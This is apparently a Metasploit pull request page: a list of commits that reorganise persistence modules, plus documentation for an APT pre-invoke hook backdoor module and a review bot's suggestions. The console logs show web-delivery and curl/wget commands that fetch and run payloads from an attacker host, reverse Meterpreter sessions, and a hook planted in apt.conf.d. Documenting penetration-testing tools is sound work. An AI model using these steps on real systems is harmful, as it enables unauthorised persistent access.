Persistence directory #19815

Open
wants to merge 92 commits into base: master
92 commits
62b951d  move persistence files to their own folder  (h00die, Jan 17, 2025)
b9539bb  rubocop persistence modules  (h00die, Jan 17, 2025)
e3545f3  msftidy changes for persistence folder  (h00die, Jan 17, 2025)
8138fe1  finish renaming persistence docs  (h00die, Jan 19, 2025)
d56d7ab  move persistence under exploit  (h00die, Jan 19, 2025)
9b7cc8f  modernization, updates, testing of apt_package_manager  (h00die, Jan 20, 2025)
1fbd81d  modernization, updates, testing of autostart  (h00die, Jan 20, 2025)
1877601  modernization, updates, testing of bash_profile  (h00die, Jan 20, 2025)
43244ca  create persistence lib to standardize options  (h00die, Jan 20, 2025)
5039513  modernization, updates, testing of cron  (h00die, Jan 20, 2025)
9de657e  modernization, updates, testing of persistence modules  (h00die, Jan 20, 2025)
d57237e  modernization, updates, testing of motd  (h00die, Jan 20, 2025)
a2179ab  modernization, updates, testing of rc.local  (h00die, Jan 20, 2025)
15cfde7  modernization, updates, testing of linux service  (h00die, Jan 20, 2025)
c035123  modernization, updates, testing of linux yum module  (h00die, Jan 20, 2025)
d65f2d4  further adjustments for persistence  (h00die, Jan 20, 2025)
7cfc28a  modernization, updates, testing of obsidian module  (h00die, Jan 20, 2025)
e76aa56  modernization, updates, testing of launch_plist module  (h00die, Jan 20, 2025)
a1a8c26  add link with lib  (h00die, Jan 20, 2025)
770930d  storing unfinished modules  (h00die, Jan 20, 2025)
20cdc45  wmi persistence module  (h00die, Jan 28, 2025)
1d19dc2  vss persistence  (h00die, Jan 28, 2025)
faad050  sticky keys update  (h00die, Jan 29, 2025)
3607d5b  sticky keys update  (h00die, Jan 29, 2025)
ca16ee2  sticky keys update  (h00die, Jan 29, 2025)
cda0881  windows ssh keys update  (h00die, Jan 29, 2025)
74acdf2  feat: persistence mixin draft  (dledda-r7, Jan 29, 2025)
7542fa1  feat: draft bash_profile using persistence mixin  (dledda-r7, Jan 29, 2025)
772ac96  windows persistence service conversion  (h00die, Jan 29, 2025)
6b45fb3  feat: persistence mixin and bash_profile persistence  (dledda-r7, Jan 30, 2025)
7b45372  system_v persistence pulled out from service module  (h00die, Jan 30, 2025)
4af21a6  Merge remote-tracking branch 'origin/persistence_dir' into persistenc…  (h00die, Jan 30, 2025)
5a5e813  linux service persistence module split apart  (h00die, Jan 31, 2025)
186b74c  feat: persistence mixin cleanup via rc-file  (dledda-r7, Jan 31, 2025)
782bd3b  feat: bash_profile persistence cleanup rc-file  (dledda-r7, Jan 31, 2025)
57dd846  feat: apt_package_manager persistence cleanup rc-file  (dledda-r7, Jan 31, 2025)
e154902  feat: autostart persistence cleanup rc-file  (dledda-r7, Jan 31, 2025)
490e810  rename linux persistence services to inits  (h00die, Jan 31, 2025)
1da8e44  unix at persistence  (h00die, Jan 31, 2025)
e62acab  s4u persistence module  (h00die, Jan 31, 2025)
3bbf381  windows registry persistence module  (h00die, Jan 31, 2025)
868775e  windows ps_persist  (h00die, Jan 31, 2025)
6e29418  process_exit_debugger updates  (h00die, Jan 31, 2025)
a17e152  persistence consistencies  (h00die, Jan 31, 2025)
5188b20  windows persistence moved to registry_vbs  (h00die, Feb 1, 2025)
2228190  windows persistence moved to registry_vbs  (h00die, Feb 1, 2025)
c159660  windows persistence small fixes  (h00die, Feb 1, 2025)
5dee099  windows persistence_exe updates  (h00die, Feb 1, 2025)
3a079b1  windows persistence_exe updates  (h00die, Feb 1, 2025)
5c090d8  rubocop fixes  (h00die, Feb 1, 2025)
e8fafed  fix notes metadata for unix at persistence  (h00die, Feb 1, 2025)
c36f98a  create persistence suggester  (h00die, Feb 2, 2025)
7058546  create persistence suggester  (h00die, Feb 2, 2025)
fb8e740  fixes for persistence checks  (h00die, Feb 2, 2025)
7d47bee  fix: add cleanup function persistence mixin  (dledda-r7, Feb 3, 2025)
4519ee9  fix: removed cleanup_persistence function in bash_profile  (dledda-r7, Feb 3, 2025)
5deede9  fix: cron persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
1a74cb4  fix: init_openrc persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
8c336f8  fix: init_systemd persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
68a1008  fix: init_sysvinit persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
c06e2ab  fix: motd and init_upstart persistence with new mixin and cleanup rc …  (dledda-r7, Feb 4, 2025)
b41aa6b  fix: rc_local persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
d7b55e7  fix: sshkey persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
b9141fc  fix: fix missing newline cleanup on init_systemd  (dledda-r7, Feb 4, 2025)
9ceb60d  fix: yum_package_manager persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
0762a13  fix: obsidian persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
c07e28f  fix: launch_plist persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
7db3160  fix: at persistence with new mixin and cleanup rc file  (dledda-r7, Feb 4, 2025)
0ea714e  Merge remote-tracking branch 'origin/persistence_dir' into persistenc…  (h00die, Feb 4, 2025)
6589d78  working on autostart  (h00die, Feb 5, 2025)
78c7a96  working on autostart  (h00die, Feb 6, 2025)
a935ce0  at(1) working  (h00die, Feb 6, 2025)
d902ba8  autostart finished  (h00die, Feb 6, 2025)
e2fd131  bash_profile finished  (h00die, Feb 7, 2025)
364d1a5  fix: s4u persistence with new mixin and cleanup rc file  (dledda-r7, Feb 6, 2025)
a3dcbf6  fix: process_exit_debugger persistence with new mixin and cleanup rc …  (dledda-r7, Feb 6, 2025)
37cd4c1  x: s4u persistence check method and cleanup fix  (dledda-r7, Feb 7, 2025)
fe6da60  fix: registry persistence with new mixin and cleanup rc file  (dledda-r7, Feb 7, 2025)
4fdd4ac  fix: vss persistence with new mixin and cleanup rc file  (dledda-r7, Feb 7, 2025)
0ecac47  fix: registry_vbs persistence with new mixin and cleanup rc file  (dledda-r7, Feb 7, 2025)
ce1835b  fix: persistence_exe persistence with new mixin and cleanup rc file  (dledda-r7, Feb 7, 2025)
f6159e2  fix: ps_persist persistence with new mixin and cleanup rc file  (dledda-r7, Feb 7, 2025)
a190de4  fix: service persistence with new mixin and cleanup rc file  (dledda-r7, Feb 7, 2025)
fa71e06  fix: persistence_exe install_persistence instead of run  (dledda-r7, Feb 7, 2025)
1585533  motd persistence  (h00die, Feb 7, 2025)
a29103a  various persistence updates  (h00die, Feb 7, 2025)
fbf4520  rc.local persistence  (h00die, Feb 9, 2025)
539e8d2  persistence consistencies  (h00die, Feb 9, 2025)
9af6dd6  various persistence updates  (h00die, Feb 9, 2025)
dffa622  openrc persistence  (h00die, Feb 9, 2025)
4b3ffe0  timespec for at(1) persistence module  (h00die, Feb 11, 2025)
4be5124  multi sshkey module, currently bugged  (h00die, Feb 12, 2025)
Deleted files:

- documentation/modules/exploit/linux/local/autostart_persistence.md (22 deletions)
- documentation/modules/exploit/linux/local/motd_persistence.md (37 deletions)
- documentation/modules/exploit/linux/local/rc_local_persistence.md (46 deletions)
- two further deleted files whose paths were not captured in this view

150 changes: 150 additions & 0 deletions documentation/modules/exploit/linux/persistence/apt_package_manager.md
@@ -0,0 +1,150 @@
## Vulnerable Application

This module will run a payload when the apt package manager is used.
This module creates a pre-invoke hook for APT in `apt.conf.d`.
The hook name syntax is numeric followed by text.

Verified on Ubuntu 22.04

## Verification Steps

1. Exploit a box that uses APT
2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
3. `use exploit/linux/persistence/apt_package_manager`
4. `set SESSION <id>`
5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
6. `exploit`

When the system runs `apt-get update` the payload will launch.

## Options

**BACKDOOR_NAME**

Name of backdoor executable. Defaults to a random name

**HOOKNAME**

Name of pre-invoke hook to be installed in `/etc/apt/apt.conf.d/`. Pre-invoke hook name syntax is numeric followed by text.

**WritableDir**

Writable directory for backdoor. Default is (`/tmp/`)

## Scenarios

### Tested on Ubuntu 22.04

Initial access vector via web delivery

```
$ ./msfconsole -q
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Z73D1DUW --no-check-certificate http://111.111.1.111:8181/l; chmod +x Z73D1DUW; ./Z73D1DUW& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 222.222.2.22 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:51076) at 2025-02-04 17:40:52 -0500
sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ 222.222.2.22 111.111.1.111:4545 -> 222.222.2.22:51076 (222.222.2.22)
```

Persistence

```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/apt_package_manager
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > check
[*] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > exploit
[*] Command to run on remote host: curl -so ./xTOLdQoOTv http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xTOLdQoOTv;./xTOLdQoOTv&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[*] Attempting to write hook:
[*] Wrote /etc/apt/apt.conf.d/76skoGqswo
[*] Backdoor uploaded /tmp/erNOJV96u
[+] Backdoor will run on next APT update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc

[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > jobs

Jobs
====

Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/script/web_delivery linux/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4545
1 Exploit: linux/persistence/apt_package_manager cmd/linux/http/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4444

[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
```

Run `sudo apt-get update` on the target.

```
[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.22 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:49804) at 2025-02-04 17:43:06 -0500

[msf](Jobs:2 Agents:2) exploit(linux/persistence/apt_package_manager) > sessions -i 2
[*] Starting interaction with 2...

(Meterpreter 2)(/tmp) > sysinfo
Computer : 222.222.2.22
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 2)(/tmp) >
```

#### Cleanup

```
(Meterpreter 2)(/tmp) > resource /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u
```
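Review bot: the trigger condition is stated inconsistently within this file: the first sentence under "Vulnerable Application" says the payload runs "when the apt package manager is used", while the verification steps ("When the system runs `apt-get update` the payload will launch") and the module output ("Backdoor will run on next APT update") say it fires only on an update. APT has two different pre-invoke directives, `APT::Update::Pre-Invoke` (runs only during `apt-get update`) and `DPkg::Pre-Invoke` (runs before dpkg on install, remove and upgrade), so the doc should name the directive the module writes into the `apt.conf.d` file and make the opening sentence match it. Two typos: "persmissions" in verification step 2 should be "permissions", and "Cleaup" in the "Meterpreter-compatible Cleaup RC file" output line is likely printed by the shared persistence mixin rather than this module, so fix the string at its source. The Options section should also carry a durability caveat for `WritableDir`: the default `/tmp/` is world-writable and on many distributions is a tmpfs or is emptied at boot by systemd-tmpfiles, so the hook in `/etc/apt/apt.conf.d/` survives a reboot but the backdoor binary it points at may not; when the module already requires root, a path under `/var/lib` or `/usr/local` is a more reliable default. The scenario relies on the default fetch payload (`cmd/linux/http/x64/meterpreter/reverse_tcp`), so the hook only yields a session while the fetch HTTP server and handler from job 1 are still running at the time apt is invoked; step 5 suggests `cmd/unix/reverse_python`, which has no such dependency, and the doc should say which to prefer and why. Finally, the Cleanup section removes the hook file and the binary only; the process spawned by the hook (the one behind session 2 here) keeps running until it is killed or the host reboots, and the doc should say so.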